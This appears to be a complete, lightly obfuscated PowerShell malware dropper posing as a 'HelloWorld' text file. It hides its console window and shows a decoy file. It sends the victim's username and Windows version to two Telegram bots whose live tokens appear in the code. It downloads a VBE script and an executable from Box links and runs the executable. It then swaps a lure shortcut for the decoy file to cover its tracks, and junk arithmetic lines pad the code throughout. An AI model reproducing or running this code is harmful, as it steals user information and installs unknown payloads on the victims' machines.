Add-Type -Name a0 -Namespace b0 -MemberDefinition '[DllImport("Kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,Int32 nCmdShow);'
$v0=[b0.a0]::GetConsoleWindow()
[b0.a0]::ShowWindow($v0,0)
$v1=1+2*3-4
If($v1>0){}
$v2="HelloWorld.txt"
$v3=Join-Path $env:LOCALAPPDATA $v2
$v4=@"
HelloWorld
"@
$v5=5*2-3
If($v5>0){}
$v4|Out-File -FilePath $v3 -Encoding UTF8
Invoke-Item $v3
$v6="ij05256441"
$v7=Get-Random -Minimum 100000 -Maximum 999999
$v8=cmd /c whoami
$v9="Build ID: "+$v6+" | Attack ID: "+$v7+" | Device/User: "+$v8
$v10=Join-Path $env:LOCALAPPDATA "identifier.txt"
$v9|Out-File -FilePath $v10 -Encoding UTF8 -NoNewline
$v11=7*3-5
If($v11>0){}
$v12="8601568426:AAF0GDcYJV2LmbDascdMxoCXjo6ETl0pNPY"
$v13="8601568426"
$v14=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$v15=(Get-CimInstance Win32_OperatingSystem).Caption
$v16=Get-Content -Path $v10 -Raw
$v17=$v16+"`n`nSession started for user: "+$v14+"`nWindows Version: "+$v15
$v18="https://api.telegram.org/bot"+$v12+"/sendMessage"
$v19=8/2+1
If($v19>0){}
$v20=@{chat_id=$v13;text=$v17}|ConvertTo-Json -Compress
$v21=6*2-3
If($v21>0){}
try{$v22=Invoke-RestMethod -Uri $v18 -Method Post -ContentType "application/json" -Body $v20}catch{}
$v23="8220372422:AAGHQVlF1S6-Poe2LMygb3WcnbvFRh-2B4o"
$v24="270865408"
$v25=9-3+1
If($v25>0){}
$v26="https://api.telegram.org/bot"+$v23+"/sendMessage"
$v27=@{chat_id=$v24;text=$v17}|ConvertTo-Json -Compress
$v28=4+6-2
If($v28>0){}
try{$v29=Invoke-RestMethod -Uri $v26 -Method Post -ContentType "application/json" -Body $v27}catch{}
$v30=3*4-2
If($v30>0){}
Start-Sleep -Seconds 300
$v31=2*5-1
If($v31>0){}
$v32="https://app.box.com/index.php?rm=box_download_shared_file&shared_name=r44annitv3ef9utaonjjwaofpvv9vcy8&file_id=f_2203677138810"
$v33="1446062403_house.vbe"
$v34=[Environment]::GetFolderPath("LocalApplicationData")
$v35=Join-Path $v34 $v33
$v36=9-2+1
If($v36>0){}
try{$v37=New-Object System.Net.WebClient;$v37.DownloadFile($v32,$v35)}catch{}
$v38=8*2-3
If($v38>0){}
$v39="https://app.box.com/index.php?rm=box_download_shared_file&shared_name=0bvkea5py488kgx942h0o4iupelizz6y&file_id=f_2208436158512"
$v40="1446062403_key.exe"
$v41=Join-Path $v34 $v40
$v42=7*2-1
If($v42>0){}
try{$v43=New-Object System.Net.WebClient;$v43.DownloadFile($v39,$v41);$v44=New-Object System.Diagnostics.ProcessStartInfo;$v44.FileName=$v41;$v44.WindowStyle=[System.Diagnostics.ProcessWindowStyle]::Normal;$v44.CreateNoWindow=$false;[System.Diagnostics.Process]::Start($v44)|Out-Null}catch{}
$v45=6*3-2
If($v45>0){}
$v46="HelloWorld.txt.ink"
$v47=$false
$v48=$null
$v49=@((Join-Path $env:USERPROFILE "Desktop"),(Join-Path $env:USERPROFILE "Downloads"),(Join-Path $env:USERPROFILE "Documents"),(Join-Path $env:USERPROFILE "Pictures"),(Join-Path $env:USERPROFILE "Videos"),$env:LOCALAPPDATA,$env:APPDATA)
$v50=5+3-1
If($v50>0){}
foreach($v51 in $v49){If(Test-Path -Path $v51){$v52=Join-Path $v51 $v46;If(Test-Path -Path $v52){$v48=$v52;$v47=$true;break}}}
$v53=7*2+1
If($v53>0){}
If($v47){$v54=Split-Path -Parent $v48;$v55=Get-Date;$v56=600;while(((Get-Date)-$v55).TotalSeconds -lt $v56){$v57=Get-Process -Name "wscript" -ErrorAction SilentlyContinue;If($v57){try{Remove-Item -Path $v48 -Force -ErrorAction Stop;$v58=Join-Path $v54 (Split-Path -Leaf $v3);Copy-Item -Path $v3 -Destination $v58 -Force -ErrorAction Stop;exit}catch{exit}}Start-Sleep -Seconds 3}}
exit
